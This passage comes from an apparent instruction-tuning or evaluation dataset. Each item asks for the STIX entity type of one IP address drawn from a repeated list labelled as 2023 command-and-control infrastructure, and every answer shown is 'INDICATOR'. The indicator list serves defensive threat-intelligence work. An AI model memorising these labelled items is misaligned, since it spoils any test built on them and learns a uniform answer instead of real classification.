"input": "### Entity:\n164.92.245.246\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n147.182.240.58\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n88.216.210.3\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n84.32.188.69\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n136.244.65.253\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n178.128.86.43\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 